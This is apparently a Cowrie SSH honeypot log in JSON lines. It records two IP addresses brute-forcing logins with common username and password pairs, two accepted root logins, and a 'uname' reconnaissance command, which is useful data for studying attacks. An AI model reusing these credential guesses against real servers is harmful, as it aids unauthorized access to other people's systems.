{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:24:59.616523Z","src_ip":"212.227.125.160","session":"3d1e850e2a66"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:24:59.666177Z","src_ip":"212.227.125.160","session":"3d1e850e2a66"}
{"eventid":"cowrie.login.failed","username":"bot","password":"bot","message":"login attempt [bot/bot] failed","sensor":"my-vps","timestamp":"2025-08-26T11:24:59.819232Z","src_ip":"212.227.125.160","session":"3d1e850e2a66"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:25:01.126781Z","src_ip":"212.227.125.160","session":"3d1e850e2a66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47804,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e783d4c44c9","protocol":"ssh","message":"New connection: 212.227.125.160:47804 (1.2.3.4:22) [session: 6e783d4c44c9]","sensor":"my-vps","timestamp":"2025-08-26T11:25:05.391291Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:25:05.399261Z","src_ip":"212.227.125.160","session":"6e783d4c44c9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:25:05.442511Z","src_ip":"212.227.125.160","session":"6e783d4c44c9"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang123","message":"login attempt [wang/wang123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:25:05.666827Z","src_ip":"212.227.125.160","session":"6e783d4c44c9"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:25:06.723006Z","src_ip":"212.227.125.160","session":"6e783d4c44c9"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41594,"dst_ip":"1.2.3.4","dst_port":22,"session":"357cb388842b","protocol":"ssh","message":"New connection: 83.168.105.65:41594 (1.2.3.4:22) [session: 357cb388842b]","sensor":"my-vps","timestamp":"2025-08-26T11:25:07.297688Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:25:07.299263Z","src_ip":"83.168.105.65","session":"357cb388842b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:25:07.335216Z","src_ip":"83.168.105.65","session":"357cb388842b"}
{"eventid":"cowrie.login.success","username":"root","password":"!qaz@WSX","message":"login attempt [root/!qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:25:07.443533Z","src_ip":"83.168.105.65","session":"357cb388842b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:25:07.580160Z","src_ip":"83.168.105.65","session":"357cb388842b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:25:07.580888Z","src_ip":"83.168.105.65","session":"357cb388842b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:25:07.618156Z","src_ip":"83.168.105.65","session":"357cb388842b"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:25:07.619354Z","src_ip":"83.168.105.65","session":"357cb388842b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48572,"dst_ip":"1.2.3.4","dst_port":22,"session":"17f8f1ef0e47","protocol":"ssh","message":"New connection: 212.227.125.160:48572 (1.2.3.4:22) [session: 17f8f1ef0e47]","sensor":"my-vps","timestamp":"2025-08-26T11:25:11.393826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:25:11.394744Z","src_ip":"212.227.125.160","session":"17f8f1ef0e47"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:25:11.443688Z","src_ip":"212.227.125.160","session":"17f8f1ef0e47"}
{"eventid":"cowrie.login.success","username":"root","password":"rootroot","message":"login attempt [root/rootroot] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:25:11.596456Z","src_ip":"212.227.125.160","session":"17f8f1ef0e47"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:25:11.775712Z","src_ip":"212.227.125.160","session":"17f8f1ef0e47"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:25:11.776736Z","src_ip":"212.227.125.160","session":"17f8f1ef0e47"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:25:11.827644Z","src_ip":"212.227.125.160","session":"17f8f1ef0e47"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:25:11.829015Z","src_ip":"212.227.125.160","session":"17f8f1ef0e47"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49342,"dst_ip":"1.2.3.4","dst_port":22,"session":"68d4a95d7fc9","protocol":"ssh","message":"New connection: 212.227.125.160:49342 (1.2.3.4:22) [session: 68d4a95d7fc9]","sensor":"my-vps","timestamp":"2025-08-26T11:25:16.556381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:25:16.557319Z","src_ip":"212.227.125.160","session":"68d4a95d7fc9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:25:16.607168Z","src_ip":"212.227.125.160","session":"68d4a95d7fc9"}
{"eventid":"cowrie.login.failed","username":"argebarikat","password":"argebarikat","message":"login attempt [argebarikat/argebarikat] failed","sensor":"my-vps","timestamp":"2025-08-26T11:25:16.819803Z","src_ip":"212.227.125.160","session":"68d4a95d7fc9"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:25:17.885088Z","src_ip":"212.227.125.160","session":"68d4a95d7fc9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50116,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d73729bcfd2","protocol":"ssh","message":"New connection: 212.227.125.160:50116 (1.2.3.4:22) [session: 2d73729bcfd2]","sensor":"my-vps","timestamp":"2025-08-26T11:25:22.158768Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:25:22.181144Z","src_ip":"212.227.125.160","session":"2d73729bcfd2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:25:22.258073Z","src_ip":"212.227.125.160","session":"2d73729bcfd2"}
{"eventid":"cowrie.login.failed","username":"selvananthi","password":"selvananthi","message":"login attempt [selvananthi/selvananthi] failed","sensor":"my-vps","timestamp":"2025-08-26T11:25:22.486050Z","src_ip":"212.227.125.160","session":"2d73729bcfd2"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":33258,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbab37bb184d","protocol":"ssh","message":"New connection: 83.168.105.65:33258 (1.2.3.4:22) [session: bbab37bb184d]","sensor":"my-vps","timestamp":"2025-08-26T11:25:22.910874Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:25:22.911524Z","src_ip":"83.168.105.65","session":"bbab37bb184d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:25:22.950970Z","src_ip":"83.168.105.65","session":"bbab37bb184d"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-26T11:25:23.070392Z","src_ip":"83.168.105.65","session":"bbab37bb184d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:25:23.560983Z","src_ip":"212.227.125.160","session":"2d73729bcfd2"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:25:24.111641Z","src_ip":"83.168.105.65","session":"bbab37bb184d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50886,"dst_ip":"1.2.3.4","dst_port":22,"session":"c75434259f01","protocol":"ssh","message":"New connection: 212.227.125.160:50886 (1.2.3.4:22) [session: c75434259f01]","sensor":"my-vps","timestamp":"2025-08-26T11:25:27.781131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:25:27.782202Z","src_ip":"212.227.125.160","session":"c75434259f01"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:25:27.842678Z","src_ip":"212.227.125.160","session":"c75434259f01"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"123456","message":"login attempt [lighthouse/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:25:27.998252Z","src_ip":"212.227.125.160","session":"c75434259f01"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:25:29.051076Z","src_ip":"212.227.125.160","session":"c75434259f01"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51652,"dst_ip":"1.2.3.4","dst_port":22,"session":"31653a381051","protocol":"ssh","message":"New connection: 212.227.125.160:51652 (1.2.3.4:22) [session: 31653a381051]","sensor":"my-vps","timestamp":"2025-08-26T11:25:32.950478Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:25:32.973610Z","src_ip":"212.227.125.160","session":"31653a381051"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:25:33.011211Z","src_ip":"212.227.125.160","session":"31653a381051"}
{"eventid":"cowrie.login.failed","username":"libuuid","password":"libuuid","message":"login attempt [libuuid/libuuid] failed","sensor":"my-vps","timestamp":"2025-08-26T11:25:33.252908Z","src_ip":"212.227.125.160","session":"31653a381051"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:25:34.454952Z","src_ip":"212.227.125.160","session":"31653a381051"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":44712,"dst_ip":"1.2.3.4","dst_port":22,"session":"656d34a8a190","protocol":"ssh","message":"New connection: 83.168.105.65:44712 (1.2.3.4:22) [session: 656d34a8a190]","sensor":"my-vps","timestamp":"2025-08-26T11:25:38.394766Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:25:38.395704Z","src_ip":"83.168.105.65","session":"656d34a8a190"}
